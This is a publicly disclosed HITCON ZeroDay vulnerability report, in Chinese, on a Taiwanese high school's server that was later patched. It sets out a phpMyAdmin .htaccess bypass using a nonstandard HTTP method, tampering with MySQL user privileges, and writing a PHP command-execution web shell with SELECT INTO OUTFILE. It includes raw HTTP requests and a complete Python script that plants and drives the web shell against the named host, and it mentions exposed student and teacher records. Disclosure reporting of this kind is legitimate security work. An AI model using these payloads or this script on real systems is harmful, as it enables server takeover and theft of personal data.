國立宜蘭高級中學 存在 sql injection 到 RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2021-00213
  •  發信 Vendor: TACERT台灣學術網路危機處理中心
  • Title: 國立宜蘭高級中學 存在 sql injection 到 RCE
  • Introduction: phpmyadmin 權限問題 導致可以查詢 sql 資訊 進而導致 RCE

處理狀態

目前狀態

公開
Last Update : 2021/05/01
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2021/04/21 21:34:47 : 新提交 (由 entroy 更新此狀態)
  • 2021/04/21 23:12:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/04/23 13:58:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/04/23 13:58:51 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/04/27 11:21:40 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/04/27 11:35:29 : 確認已修補 (由 entroy 更新此狀態)
  • 2021/05/01 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2021-00213
  • 通報者:entroy (entroy)
  • 風險:高
  • 類型:遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://xms.ylsh.ilc.edu.tw/

敘述

phpmyadmin 用 .htaccess 作防禦
用其中 limit 以外的 method 就可以繞過,我用的 method 是 GETS
.htaccess

AuthName PhpMyAdmin
AuthType Basic
AuthUserFile "C:/XMS/www/phpMyAdmin/.htpasswd"
<Limit GET PUT POST>
require user sysop
</Limit>

之後發現沒有做好權限管控,所以直接是 [email protected] 的權限
直接用

select "<?php phpinfo();?>" INTO OUTFILE "c:\\路徑\\shell.php"

發現沒有權限寫入,得到以下資訊

Access denied for user 'root'@'localhost'

參考 https://stackoverflow.com/questions/17975120/access-denied-for-user-rootlocalhost-using-password-yes-no-privileges
發現 user root 缺少了 authentication_string,所以直接新增 column 以及 data,我是用 burp 送的
新增 column:

GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=ALTER+TABLE+user+add+COLUMN+authentication_string+VARCHAR(15)
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0

寫入 data:

UPDATE user SET authentication_string=password('password') WHERE user='root'

重整:

FLUSH PRIVILEGES;

之後就可以寫入了

GETS /phpmyadmin/sql.php?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C4eff2c041976ea22afb7092a53188c70.php%22
&goto=main.php HTTP/1.1
Host: xms.ylsh.ilc.edu.tw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=916d8b77d4260195ae71358a792f6829
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0

完整的 python script:

import requests
import subprocess
import time
import hashlib
import sys
import os

def getCommandResult(command):
    p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, close_fds=True)
    _, _ = p.communicate()

def get_filename():
    m = hashlib.md5()
    data = str(time.time())
    m.update(data.encode('utf-8'))
    h = m.hexdigest()
    return str(h)

def upload_webshell():
    filename = get_filename()
    getCommandResult('''curl -X GETS 'http://xms.ylsh.ilc.edu.tw/phpmyadmin/sql.php/?lang=utf-8&convcharset=iso-8859-1&server=1&db=mysql&sql_query=select+%22%3C%3Fphp%20if%28isset%28%24_POST%5B%27cmd%27%5D%29%29%20%7Bsystem%28%24_POST%5B%27cmd%27%5D%29%3B%7D%20%3F%3E%22%20INTO%20OUTFILE%20%22c%3A%5C%5CXMS%5C%5Cwww%5C%5Cxms%5C%5C{}.php%22' -v'''.format(filename))
    time.sleep(1)
    if requests.get('http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)).status_code != 200:
        return False
    return filename

def webshell(filename):
    print('q or ctrl^c to quit')
    print('=========================== webshell ===========================')

    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    while True:
        cmd = input()
        if cmd == 'q':
            break

        data = {
            'cmd': cmd
        }
        result = requests.post(url, data=data)
        result.encoding = 'big5'
        print(result.text)

def del_webshell(filename):
    print('deleting webshell ... ')

    url = 'http://xms.ylsh.ilc.edu.tw/xms/{}.php'.format(filename)
    cmd = 'del {}.php /f'.format(filename)
    data = {
        'cmd': cmd
    }
    requests.post(url, data=data)

def main():
    print('Uploading webshell ... ')
    filename = upload_webshell()
    try:
        if (not filename):
            print('Upload webshell failed ... ')
            exit()
        webshell(filename)
        del_webshell(filename)
    except KeyboardInterrupt:
        print('Interrupted')
        try:
            del_webshell(filename)
        except SystemExit:
            os._exit(0)

if __name__ == "__main__":
    main()

進去之後發現有學生老師的個資以及成績相關的資料

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;